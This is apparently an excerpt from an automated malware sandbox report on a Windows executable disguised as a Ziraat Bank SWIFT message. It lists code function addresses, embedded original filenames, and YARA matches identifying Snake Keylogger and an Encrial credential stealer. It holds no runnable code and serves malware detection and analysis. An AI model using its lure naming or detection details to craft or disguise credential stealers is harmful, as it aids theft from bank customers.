                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 0_2_069496C80_2_069496C8
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 0_2_0694E6200_2_0694E620
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 0_2_06941E7A0_2_06941E7A
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 0_2_06942CF80_2_06942CF8
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 0_2_06940B900_2_06940B90
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 0_2_069480A00_2_069480A0
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 0_2_069486980_2_06948698
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 0_2_069486880_2_06948688
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 0_2_069496B80_2_069496B8
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 0_2_06948E400_2_06948E40
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 0_2_06949FBA0_2_06949FBA
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 0_2_06949FC80_2_06949FC8
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 0_2_06944F100_2_06944F10
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 0_2_06944F000_2_06944F00
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 0_2_06942C9E0_2_06942C9E
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 0_2_06942CAD0_2_06942CAD
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 0_2_06943CF80_2_06943CF8
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 0_2_069414400_2_06941440
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 0_2_069455880_2_06945588
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 0_2_06943D080_2_06943D08
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 0_2_0694A5700_2_0694A570
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 0_2_0694557A0_2_0694557A
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 0_2_0694A5600_2_0694A560
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 0_2_06948A900_2_06948A90
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 0_2_06948A800_2_06948A80
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 0_2_069453980_2_06945398
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 0_2_069453A80_2_069453A8
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 0_2_06940B3D0_2_06940B3D
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 0_2_069483580_2_06948358
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 0_2_069483480_2_06948348
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 0_2_06940B760_2_06940B76
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 0_2_069480900_2_06948090
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 0_2_069418D90_2_069418D9
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 0_2_069400150_2_06940015
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 0_2_069400060_2_06940006
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 0_2_069400400_2_06940040
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 0_2_069451180_2_06945118
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 0_2_069451080_2_06945108
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_0111C1685_2_0111C168
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_011127B95_2_011127B9
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_0111CAB05_2_0111CAB0
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_01114F085_2_01114F08
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_01117E685_2_01117E68
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_0111B9D85_2_0111B9D8
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_0111B9E05_2_0111B9E0
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_0111CAAE5_2_0111CAAE
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_01112DD15_2_01112DD1
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_01117E595_2_01117E59
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_01114EF85_2_01114EF8
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_02BE69985_2_02BE6998
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_02BE77705_2_02BE7770
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_02BE1C585_2_02BE1C58
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_02BE15F85_2_02BE15F8
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_02BE45005_2_02BE4500
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_02BEFA885_2_02BEFA88
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_02BE2AF05_2_02BE2AF0
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_02BE2AE05_2_02BE2AE0
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_02BED2385_2_02BED238
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_02BED22A5_2_02BED22A
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_02BEFA785_2_02BEFA78
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_02BEA2705_2_02BEA270
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_02BEA2615_2_02BEA261
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_02BE33A05_2_02BE33A0
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_02BE33925_2_02BE3392
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_02BEB3D05_2_02BEB3D0
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_02BEB3C15_2_02BEB3C1
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_02BEAB205_2_02BEAB20
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_02BEAB105_2_02BEAB10
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_02BE40A85_2_02BE40A8
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_02BE40985_2_02BE4098
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_02BE08F05_2_02BE08F0
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_02BE08DF5_2_02BE08DF
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_02BEC0D85_2_02BEC0D8
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_02BEC0CA5_2_02BEC0CA
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_02BEB8285_2_02BEB828
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_02BEB8185_2_02BEB818
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_02BE00065_2_02BE0006
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_02BEE0785_2_02BEE078
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_02BEE0685_2_02BEE068
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_02BE00405_2_02BE0040
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_02BE11A05_2_02BE11A0
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_02BE118F5_2_02BE118F
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_02BEC9885_2_02BEC988
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_02BEF1D85_2_02BEF1D8
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_02BEF1C85_2_02BEF1C8
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_02BEE9285_2_02BEE928
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_02BEE91F5_2_02BEE91F
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_02BEC97A5_2_02BEC97A
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_02BEA6B95_2_02BEA6B9
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_02BED6905_2_02BED690
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_02BED6825_2_02BED682
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_02BEA6C85_2_02BEA6C8
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_02BEF6305_2_02BEF630
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_02BEF6205_2_02BEF620
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_02BE9E185_2_02BE9E18
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_02BE37F85_2_02BE37F8
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_02BE37E85_2_02BE37E8
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_02BE2F385_2_02BE2F38
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_02BEAF785_2_02BEAF78
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_02BEAF685_2_02BEAF68
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_02BE2F485_2_02BE2F48
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_02BE04985_2_02BE0498
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_02BE9C905_2_02BE9C90
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_02BE048A5_2_02BE048A
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_02BEBC805_2_02BEBC80
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_02BEE4D05_2_02BEE4D0
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_02BEE4C05_2_02BEE4C0
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_02BEDC205_2_02BEDC20
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_02BEDC125_2_02BEDC12
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_02BEBC715_2_02BEBC71
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_02BE3C505_2_02BE3C50
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_02BE3C425_2_02BE3C42
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_02BEED805_2_02BEED80
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_02BE15EA5_2_02BE15EA
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_02BECDE05_2_02BECDE0
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_02BECDD05_2_02BECDD0
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_02BE0D3A5_2_02BE0D3A
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_02BEC5305_2_02BEC530
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_02BEC5205_2_02BEC520
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_02BEED705_2_02BEED70
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_02BE0D485_2_02BE0D48
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_054126985_2_05412698
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_05414DC05_2_05414DC0
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_05412CE05_2_05412CE0
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_05414A585_2_05414A58
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_054197945_2_05419794
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_054116205_2_05411620
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_054133305_2_05413330
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_054139805_2_05413980
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_0541048A5_2_0541048A
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_054104985_2_05410498
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_054126875_2_05412687
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_054100405_2_05410040
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_054100065_2_05410006
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_05412CD05_2_05412CD0
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_05410B205_2_05410B20
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_0541B7D05_2_0541B7D0
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_054116105_2_05411610
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_054133205_2_05413320
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_05413FC85_2_05413FC8
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_05413FB85_2_05413FB8
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_054139725_2_05413972
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_054199905_2_05419990
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_054199A05_2_054199A0
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_06E596E05_2_06E596E0
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_06E596D05_2_06E596D0
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_06E587385_2_06E58738
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_06E554205_2_06E55420
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_06E554105_2_06E55410
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_06E554195_2_06E55419
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_06E55BB05_2_06E55BB0
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000000.00000002.2098682395.0000000007400000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs Ziraat Bankasi Swift Mesaji.exe
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000000.00000000.2053652898.00000000003D4000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamecfgg.exe, vs Ziraat Bankasi Swift Mesaji.exe
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000000.00000002.2094610153.000000000095E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Ziraat Bankasi Swift Mesaji.exe
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000000.00000002.2096033860.0000000003F44000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Ziraat Bankasi Swift Mesaji.exe
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000000.00000002.2099316025.0000000009F70000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Ziraat Bankasi Swift Mesaji.exe
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000000.00000002.2096033860.00000000036D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCloudServices.exe< vs Ziraat Bankasi Swift Mesaji.exe
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000000.00000002.2096033860.00000000036D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs Ziraat Bankasi Swift Mesaji.exe
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000000.00000002.2095590054.0000000002883000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCloudServices.exe< vs Ziraat Bankasi Swift Mesaji.exe
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4526360841.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCloudServices.exe< vs Ziraat Bankasi Swift Mesaji.exe
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4526473415.0000000000CF7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Ziraat Bankasi Swift Mesaji.exe
                Source: Ziraat Bankasi Swift Mesaji.exeBinary or memory string: OriginalFilenamecfgg.exe, vs Ziraat Bankasi Swift Mesaji.exe
                Source: Ziraat Bankasi Swift Mesaji.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3704448.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3704448.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.371c468.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.371c468.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.371c468.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.371c468.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 5.2.Ziraat Bankasi Swift Mesaji.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 5.2.Ziraat Bankasi Swift Mesaji.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3704448.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3704448.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.4122f48.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.4122f48.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.40c6928.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.40c6928.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 00000005.00000002.4526360841.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000000.00000002.2096033860.00000000036D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000000.00000002.2096033860.0000000003F44000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
